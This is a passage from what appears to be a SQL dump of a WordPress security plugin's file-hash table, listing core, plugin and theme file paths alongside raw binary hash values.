;�}h��','wp-includes/blocks/columns/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'��t��yT}#!>f�','\r�>�󳬔J�I�F2��A0�ӡIƶ��<�','',0,'?'),('Իq�E�{���n���','wp-includes/blocks/verse/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y����Vq�Y�\n�','MbO<W\'8!����A��S�\r�G_n0���s�','',0,'?'),('�Ȇp���]4��L��q�','wp-includes/css/admin-bar.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`Q!��&)�`���t','��B�C��һfT=��R���O���\"7��J�','',0,'?'),('��p��S��`�]T]D�','wp-includes/css/dashicons.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',J��/��n�R�~�','qԡ���c��q�l5/�3$˝T�GW�','',0,'?'),('�̆lҘ�\\�4�,C-�m','wp-includes/css/dist/block-library/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\"�\0�Z�_��','�*f�9c,f��\n?��\na����n�\r��~��','',0,'?'),('���/�q��RR�|���','wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�R���!z@;�Ve����','�#��l�#�к;�	KAH9Q�@�	����B~�','',0,'?'),('�X��$�a��B��^','wp-admin/js/user-suggest.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6|3����s�J:+IV�','nj�0B�Ƞ|�qO�	F����>��g������#','',0,'?'),('�\Z3	b�ws0{/!Bm�','wp-content/plugins/wp-cerber/assets/flags/lu.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#x�I���@K���','��f\0�4����;)��x�6ҽՖx�&X��w�v','',0,'?'),('�BImS��96�7���X','wp-content/plugins/wordfence/crypto/vendor/composer/ClassLoader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��y�G�M�!ex9��','�!ZgbZ��FZ���z����|�YE�	���','',0,'?'),('�gֿ��m�㋣��I','wp-includes/js/dist/data.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G&��TS%1;*�O','�)X6C��^o���l[���ʊe���Ҁӏقd�','',0,'?'),('�p8��UY?(?9ـB','wp-content/plugins/wp-cerber/languages/wp-cerber-pt_PT.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����ٌ�M!�\Z���','�N=x�p9Ԧp��H��сbᚕ�US�1\n�[�','',0,'?'),('�p�sZZ�#�N7��e�','wp-includes/css/dist/block-editor/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��n�Cl=?���','�6x����\"-����Cio�Qz]����=��u','',0,'?'),('�uG#�)�|�^���6','wp-includes/Requests/Exception/HTTP/511.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ݧ3�*�=�A>�9���','��I��}7+ƕ�A���l欿B��t�\'s��t','',0,'?'),('ՙ�5qV��#Y�','wp-content/plugins/wp-cerber/assets/flags/ro.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�i�N����C�Eѩ-�','�J7d[�^k`�\0v�?ł�;%`a[)','',0,'?'),('��G�=�ذ�XӶcC�','wp-content/themes/newsmagbd/vendors/widget-helper/class-widget-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*Kd�}g��kڟ,P','�A��IX�}!	�X*�G�\\j@a�[X6���','',0,'?'),('�K2;�<D����kub','wp-content/plugins/wordfence/lib/wfStyle.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s���1_�e�k2R����','j�颎����_c�632�3օ�]Gs}.\n','',0,'?'),('���ͤ6�\0/��k���','wp-includes/js/imgareaselect/jquery.imgareaselect.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ws���H��j����','���&�TK��;�$(�ᢡOg�p�m]��','',0,'?'),('�<�8�;p� x�TG','wp-includes/css/dist/edit-widgets/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Oi�<��L�%*d�q','nUN����fw�x�28���rG�-�\r��k','',0,'?'),('�Q|�O\\��iqʼnu0','wp-content/plugins/redirection/api/api-404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�/��Y�|�r���L�','�+�0:� ����+G���Vb+�o]','',0,'?'),('�Xډ|�8���}�B�','wp-includes/js/tinymce/plugins/link/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��V\\\n]��K�s\'�','\Z�>��I�S�е�����v�,��q�U����^','',0,'?'),('�Z�	r!ޏf���	�','wp-includes/images/icon-pointer-flag.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��,���E^�j`\'','oq��9��a{)h}=#�����T�ק��','',0,'?'),('�j���#�Ӳ��X%�I','wp-includes/block-supports/elements.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����2�(�xXJ5&�','�9�*�9?bzN�#>�#�u|�P5\0Љ:�G�\0','',0,'?'),('�oҨ*K��o�7{� <','wp-includes/ID3/module.audio-video.matroska.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^w�\'Z��Do4d].�','bA�O����C���r5Y\0��se�A�ʏ0���','',0,'?'),('�rY�S�xwDY˚J�[','wp-includes/images/media/interactive.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R׬˂���ôʼnh�H','{�� [K��\0!�긽��/�\\�lw.����','',0,'?'),('֋�8�[�����0�ʊ','wp-content/plugins/wordfence/views/waf/debug.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ɖ9�/Y������','[γ�s	`�A���;�y_���<��X�\Z�%Y�','',0,'?'),('֌��q�ó�X�[���','wp-includes/class-wp-feed-cache.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z��ط?h\"��%c��(\0','lh�>��6�<Z,2��1*!�cm;z~��܏�4��','',0,'?'),('ֶ��9؞f�po3t','wp-includes/class-wp-admin-bar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�~�;1�q�h��Nu�','g��)HH^�t�\\�(Ɵ9S��vI}�\n��\rY��','',0,'?'),('��J��!�[W6ݧ�','wp-content/plugins/wordfence/lib/IPTraf.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��8�w�VX�8��~$�','����%����m���򳚫-[�\0:�&��','',0,'?'),('���B��W���k\rZ{��','wp-includes/sodium_compat/lib/ristretto255.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5\\S���z���','�\0h���=�`]U3�g��殼4%1��9x�*�','',0,'?'),('�ߢ\Z�s>����\'�','wp-content/plugins/redirection/locale/redirection-es_VE.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����A��A؂��yf','j(PƑb���^����F����<�:?��','',0,'?'),('��<��b�XUM�@\\!','wp-content/plugins/wp-cerber/assets/flags/pt.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��8��,t7s\'��=K^','qd<Q\Z�fe�-�	%�7��5[�1�+i�uG�','',0,'?'),('�%�u�c�p֖��]�','wp-includes/blocks/calendar/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z\n������Uz�PU��','���2aC�[[��n�k�2!\ZR3L�.6l�R�','',0,'?'),('�Gȩ��6����\0Y','wp-admin/includes/class-wp-posts-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��l��ZZ\0dPei8','ޥ%���z�g�,!o�>]��t��j�yY̎�R�','',0,'?'),('�I�	J��a~R��Z�','wp-admin/includes/class-wp-application-passwords-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ţ�{��LlF��','�ۖ-<��ύ�C\"�(���Q���,Hn�C�\\8��','',0,'?'),('�M\0���c����_d�','wp-admin/includes/class-file-upload-upgrader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w��;>�x�Z�s�6','[\"o�^�.q`Oצ��v��<���Q�+FM�4��','',0,'?'),('�f�k[x���� \\�/Y','wp-includes/js/dist/redux-routine.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�k���r��1��','B��y<�٢S�]��AnX�{���B�#�I�','',0,'?'),('�w�h]�á�&�wM��','wp-includes/class-wp-network-query.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G��R�~|8�Z��1[�','��Z[�JM��D�Ң\n�*Ұ�k�+���:','',0,'?'),('�w��L��<qoj��|�','wp-content/plugins/wp-cerber/languages/wp-cerber-lt_LT.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�tb1M�w��W�4�[?','I\n���4sD����|��x�y��pe�M̀��M','',0,'?'),('�{��wk5�%����','wp-content/plugins/all-in-one-wp-security-and-firewall/images/form_bg.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�6N�?l�1���FsT^','�\0+\"\"��:*8l��Ia�-(��/\rsL�','',0,'?'),('מ�y�7mE5���O_�','wp-admin/js/media.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��-:�(��%�O�\n�~','x�(����˻������Y}hu^8?K���Z','',0,'?'),('�Ć��c��ij�B;�','wp-content/plugins/wp-cerber/cerber-pluggable.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\%�9��,\rY\Z�+N','\"�&��=+�3ʰ�;��\r�I[h�NY���','',0,'?'),('��j0���w�E}®R�','wp-admin/css/wp-admin.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�e�Upʓ�H�WtP!�H','�^���E-�R�����\'#?�le��mL0�kU@�','',0,'?'),('�⯹��S�)�w.�\"A','wp-content/plugins/wordfence/js/wfpopover.1629122067.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';�&m�A�hlMPZX','��_.V袏���X��4N�i_�k=��C3','',0,'?'),('��^�u����}�G��','wp-content/plugins/wordfence/lib/email_unlockRequest.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��΁~͟��ak��','u\Z�g$}o����bĄ��+\r��\n���8�','',0,'?'),('��\Zv�I:wm�\'~K-','wp-includes/ID3/module.audio-video.riff.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\"���:\'9���P�','��}\",.~�~��s����U�5�~�`x��P�','',0,'?'),('�&�Zh�$�Éo�','wp-includes/class-json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','kE\Z�[Z����䰱�','�D����t��5��^	�σ�7�2��7�{','',0,'?'),('�8/B��$8���`m�','wp-includes/js/imgareaselect/jquery.imgareaselect.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-��?��ES+�','���,��OT[9�pm��Ỵ�Ó,�����=f�','',0,'?'),('�A�h)I�\Z]Gr��E','wp-admin/includes/import.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���&�m�|�<��(`�','6\r6\r�@�u<�z(�_�����0�v�*�','',0,'?'),('�C>��J����w��','wp-content/plugins/all-in-one-wp-security-and-firewall/images/info-icon.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ѡ�F�hO\nȆ=�b�','�NrR�\0�Λ$�FN�Y���C%��m�\rK*�','',0,'?'),('�J=R\'���t^�}�\n','wp-content/plugins/wordfence/images/2fa2.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����\0��H','n�p��ʅ���G��0�6Kq�J]����J�','',0,'?'),('�M&�3\r�3CMaQ{','wp-admin/images/yes.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�+��7܉�\rqZ�Qk','�=�Q��G���9%�K���,�\r�\ZF�y���','',0,'?'),('�V��5�<�\0���v��','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/grade-system/wp-security-feature-item-manager.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��e�z��ku�)-�<K','AG��%N?�LQ=4��c�yO���\',�@�b','',0,'?'),('�o�ǣ�	ף�f0�Y','wp-includes/SimplePie/Core.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ز3aݩ�0)��_�S','���760�w8��([���o�W��K��4d���','',0,'?'),('�v����\r�&X��','wp-includes/js/jquery/ui/selectable.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ZIr��]-�4��','�]���+�R��s���z�lC�a���(8��','',0,'?'),('�x��βЦ��A	�<�','wp-content/plugins/wordfence/lib/wfCrypt.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C�R`�����9|�e','U�͊�s��ds�9;�C�O���Ȥ�@','',0,'?'),('ر�-�_}Z�h��\n�\Z','wp-admin/includes/class-walker-nav-menu-edit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;YҮ|=�q\r�R.;\'','�@밋�k�`]�gsy�j����h��2�g[9','',0,'?'),('ط�;����\0���','wp-content/plugins/wp-cerber/assets/flags/cy.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d�o||/$�B���l','븻�Òc���.\"��0C�i+\Z�\Z�{pċ����a','',0,'?'),('ؽ�)��uҶ�ew��l','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/InsufficientFundsException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�mhOല�f�.I','�o�O�b�9_��b�-4��-�x%�T���5E9\'�','',0,'?'),('�φ{)�e]�ŝ�4ܴ�','wp-content/plugins/wp-cerber/assets/flags/sc.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e���\'hz�\Z�uR�m�','1W��b�[^\'�J�Z�O��\0.\n )����','',0,'?'),('��ҡ���K%����^�','wp-includes/js/dist/dom-ready.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���!��N�J�A��v','T��II-�U{z�]m��RX��>�@[jt�X','',0,'?'),('�-h\n\r`��ýەC/s','wp-includes/class-wp-query.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-̘�sU�����{�','\n4�6�K��(�z��U<���o�����A�p5','',0,'?'),('�(]���H,ú��\"c','wp-content/plugins/redirection/models/log/log.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�-q�t��8˵�2�6','���wh�U9\"�rWm��	���&���\0�I�','',0,'?'),('�,(�i7:^�^�#','wp-includes/js/tinymce/plugins/paste/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','dX�������z҆֫','�f��\0W{?q��������Ul�P�֫c8','',0,'?'),('�J��^\Z7��uG�k+','wp-content/plugins/wordfence/lib/wfDB.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P�_<���-1�__I��u','�%d����d��_�\01@TY�$����A','',0,'?'),('�M��{0:�\0L���4','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-list-login-fails.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����N�?Jk����','Q=\0oW�o9�7i�d�@S\Z=�ל�5�%h�T','',0,'?'),('�d��%3��Z�4��_+','wp-includes/css/dist/edit-post/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����m� �yR����','�ID��<�k�᲏N�Ә�\r��ں������r~','',0,'?'),('�k��/y�����&��G','wp-includes/images/rss-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ya[�Q���rj�','yS0�c`\n7��as��#�n��Y���','',0,'?'),('�l;ao��~�G��','wp-includes/Requests/Exception/HTTP/501.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\0�jQc:�1NiD','�k�G寲�\n΃CD#�6�u\Z�քEڣ@K1','',0,'?'),('و�TĖhx~Dt>l�','wp-includes/js/dist/compose.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r\\���u9�w�肂�`9','����:A�|\\hx��k�}-�If{��S�-Q�v��','',0,'?'),('٘�\"P�ܞ��,���','wp-content/plugins/wordfence/images/icons/ajax24.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K:�����m𙗣P�','j*�e����doX�~�7��&���N�9�|L���','',0,'?'),('ٱ��MPr��h~���','wp-includes/blocks/post-content/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','dD�J��2��=�i�','-P��]		6��?��rW�ߺaV����','',0,'?'),('��{��]]��R�\n]','wp-content/plugins/wp-cerber/assets/flags/md.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z6>�x��D�\ZL/x\n','���[Ρj*�Z�\'��ӛ�U!Wa�����\\','',0,'?'),('��3��I�98\\�֛�[t','wp-includes/random_compat/random_int.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*�RX�Ǡ�ͤB�n6','8�-%���s�`N��a�L	�L�M�ʫ�)�','',0,'?'),('��!}�=�`*�gZ=','wp-admin/network/themes.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ь�ԥ�d�o|��ܪ','��%�v׫\0���\r��΋��:c��GO���','',0,'?'),('�VBǡ��\Z�B\"\0��','wp-includes/js/codemirror/esprima.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d_� �S��g��ٛ��',']�;�%Js��lx��Fq��BH\Z�U8��','',0,'?'),('�>�~�!�g�q��','wp-includes/js/tinymce/skins/lightgray/skin.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\\��B���&�pw�','7>xV&v|­��U�& ݷ\"ǥz9j�F%ѽK��V','',0,'?'),('�\r��Be�ׯE�7','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Location.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Y}���`8v�FJ','�U��߆(�[�r嵳��g���h��嬵!m9(\"�','',0,'?'),('���u��xy���','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0��	��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('��w�=Ţ�O�&�F�','wp-admin/css/colors/midnight/colors.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&܍���|DW��!E�4','S��o�Gp����{���\"�FuS�&�����','',0,'?'),('�\'��7��b��~ 6','wp-includes/sodium_compat/src/Core/Base64/Original.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ң-���с��','�9\0zot�ID:\0����g� I%�~ަ��$o','',0,'?'),('�,\r��	�g�H�6','wp-content/plugins/wordfence/views/scanner/issue-wfPluginUpgrade.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���H�v�������','t	Nɼ!\'�W���`�1��1���1�኿!�','',0,'?'),('�2�6,̞|ke�L\ns','wp-content/plugins/wordfence/images/2fa1.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/)�h\\ h�G�8�','C�%�0�z)f ����@�t>��ɶ{T��8�o�','',0,'?'),('�V���C����dvۦ�','wp-includes/blocks/file/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[�@�/�S��2D��','~@m	.3�Q[�J��4k�-�֦�����h','',0,'?'),('�u78�¸�KԊkh�','wp-content/plugins/wordfence/views/scanner/issue-control-show-details.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�tJֶ�Dܒ�+�C','��\"uu�g�I$E���D=��\n���Q��g-�TZ','',0,'?'),('�|�#�԰#�{����','wp-admin/js/link.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n��w��h�����s�[','�y׈�h8�Hi*\r!���4*�<9g�V\"�U��','',0,'?'),('ډx`�9�LťM��,L','wp-includes/css/dist/block-editor/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O`�����\n����S�Y�','/��Z��;ׅh��ng�z� {c�/ĵ���','',0,'?'),('ښ��޴�����u�_�','wp-includes/blocks/post-template/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T�^\Z�	��x�iK^8��','@fLC\r	5?[Y~�K�����^3aҭf��%�','',0,'?'),('�Š�#6�K%#f\r�','wp-includes/js/dist/vendor/wp-polyfill-element-closest.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���H0�c;`���W&','2A]�ڛ\\e��WߦkZ�s���c�<�`�d)�','',0,'?'),('��̭\n5�B����+�l','wp-includes/blocks/gallery/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~ɮ�gMw�|}[��\r','��9��O�D\"��ɩő\'j���zkW��[��}�','',0,'?'),('��J�B�&9:V�F[�','wp-includes/js/dist/media-utils.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��8�asꋪm��Y�','q~Is^�{�[����`j���T�Y����>','',0,'?'),('���C�.yj\0o�*�f�','wp-content/plugins/wordfence/views/scanner/option-scan-signatures.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L\Z3`f��і{_z�q',' .IET��أ��J#�J�Uk�7�hy��\\�0�','',0,'?'),('�!�(t��<Թ','wp-includes/js/heartbeat.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R�[�f���:��','c��V��g-�$6�[\"�3i�<�~�w���\"�N','',0,'?'),('��_\r�JL�#�@B��','wp-admin/css/colors/midnight/colors.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\"�;4��3�#�L%','tP01)c���3���,~�h�ܚ�Ox�:���d','',0,'?'),('�ƪ�D��|��\"�3��','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0��	��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('� �I�_X�����?','wp-admin/js/gallery.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�XJ7���jp��8�n�T','+:��U�.��v�fKBUL���+s��h[','',0,'?'),('�4V��s#�,�Q��','wp-includes/blocks/query-pagination/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')��c�i�?\\��$3','5K��ߒAͼ~��;#x�(ĬE�-�-�}���','',0,'?'),('�4��6�1�m��Y�R','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�nH\0�u�}� `����','���R�&�X��d�[��4���9��V�I','',0,'?'),('�v6^A��A/],6\'y:','wp-admin/css/site-health.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�W�*x�\"p��!0+d�','\'�r�O[Fpi׋_��=��cE�uYN�f1�]','',0,'?'),('ۋ{S0\0\0=�1_ئ\r�5','wp-includes/js/dist/priority-queue.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ޮP�\\��r�k���H','�\"��?��G^階t������\'����m�C�','',0,'?'),('ۖJ�Bw�C��|M�v','wp-content/plugins/wordfence/lib/Diff.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5VzY�]�#yR��Jݮ','Y�M�\"z)tϖ���*c�wL\0�����1w$d��','',0,'?'),('۪��	.�ո�\\���','wp-includes/js/tinymce/skins/wordpress/wp-content.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����`��Un\0\r��','>���@�:so���X�=��Kd��ku�{�','',0,'?'),('��r�����؁=�Ԓ�','wp-includes/images/rss.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��[�(�.��*NZ�','j�(-9��_��E-#�we�$�]o�01��u','',0,'?'),('��\np���Gnu:���','wp-includes/js/colorpicker.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��V g�����-�','�V�w��%�%�:�3CQ#+g��	��e�}�','',0,'?'),('��:�ҝ\Zdm���*v','wp-content/plugins/wp-cerber/assets/flags/ie.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t�Ht�`��Mˉ.2*','��H�X�� �\Z�۴�n��\0y��n��n','',0,'?'),('�F���\ru�D�b7','wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-segmented.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��m�E���}8ןb�,','dh��nC���[�$���P7�xH\"8�i\Z*�','',0,'?'),('�ȼ�؟�\'\r`����','wp-includes/feed-rdf.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xG�7�%���\0b���','p=m=G�l�h�nh��V��]�-�+�1�a','',0,'?'),('�2G�?�_�\\��-B','wp-includes/canonical.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��G��o<����ݏ�','����1\r�eɓ�������Y宒^zՒ=�F�1','',0,'?'),('�M\\-D�kf����','wp-content/plugins/wp-cerber/assets/flags/kw.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H�p8V��$vL\r�Y]�','&�\\m0���Iz{<�>��|���\'����L','',0,'?'),('ܑK�ݓ���%eP�^U','wp-content/plugins/wordfence/views/scanner/issue-checkGSB.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g�}�h�k9�yb�(W','���\ZD��Q�^��\\�����9��;�7v��F�','',0,'?'),('ܽ3�s�O�}��H5�','wp-content/themes/newsmagbd/inc/wigets.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' @?��h�r��YG$','Gg�������nٟX̩9�MdjǨ;��c�S�X','',0,'?'),('���.�U�	��Y��=','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/byte_safe_strings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�h���`����V�Af','<�\\�G��;1#��k�L��à��(փ','',0,'?'),('��Tо�R���\'�{','wp-content/plugins/wordfence/lib/wfPersistenceController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%��ky���i�MO*','����X(�30\r\n��\nPE�̠�� �9��','',0,'?'),('��ջZml��4�ˮU','wp-includes/images/smilies/simple-smile.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�K��{…��f�w�h','�?Y�ag\\�<y����0\01��8�3��H�g','',0,'?'),('���J�c��b�m�','wp-content/themes/newsmagbd/page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�|���ur��]�r���','���F�Z�/x\r`��=\0�����З�-�[��,','',0,'?'),('��0���\Z/1��~','wp-includes/blocks/query-pagination/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+���N(�eI�lw��','s8Zf��V��&dc�ٽa)��l�r��','',0,'?'),('��\r\0FJ��B��e�','wp-login.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��:�p���ęo#��',',�A�m�C[.MdD\r+��eJ�k��','',0,'?'),('�׵(���K�B��','wp-includes/js/codemirror/fakejshint.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5�v�,ROlx]J\')K','��-�6�$$�;���}ptO�4]2��ТR�5֡','',0,'?'),('�J0���j�Yg�h�','wp-includes/js/tinymce/plugins/lists/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2�8��:s��w�9�J��',')b�#4�e��*�9(��=�QE�e0|1���\n�','',0,'?'),('�[6�5��+�	�n9�','wp-admin/images/sort.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�������*� ����3','vP���-~�x��O\"	�����;��','',0,'?'),('�`��L\\3-i�_3�S\r�','wp-includes/blocks/code/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����(�궲zhɶ',' ���6�r3����C9a�ْ�~ȝ���:�','',0,'?'),('�f��y���ħ�*!','wp-admin/js/nav-menu.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3_[��2W�޲/4R��\Z','WU�!)�=�Eο5偬�bnd�}l,����','',0,'?'),('�~V�5VU�60v�bG','wp-content/plugins/redirection/locale/redirection-nl_NL.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*��^�Cr�\Z��,F�H','�;U7�|�d�?~��$aV/��cb�����=�','',0,'?'),('ݖ�\'�\"|3�_�t|��','wp-includes/class-wp-term.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Q5��ׄXZ��','�}Gj)p�����O�7�٠fݒ���ፎ�Y�p','',0,'?'),('���4�����','wp-includes/blocks/media-text/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j�B��25U�ИN�B�','@��e!��Eϑp\ZX��;�TSb���,z�','',0,'?'),('�ӟ���j/pO\\)�?�H','wp-content/plugins/wp-cerber/languages/wp-cerber-uk.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��b�s.Ju37#g�}',' 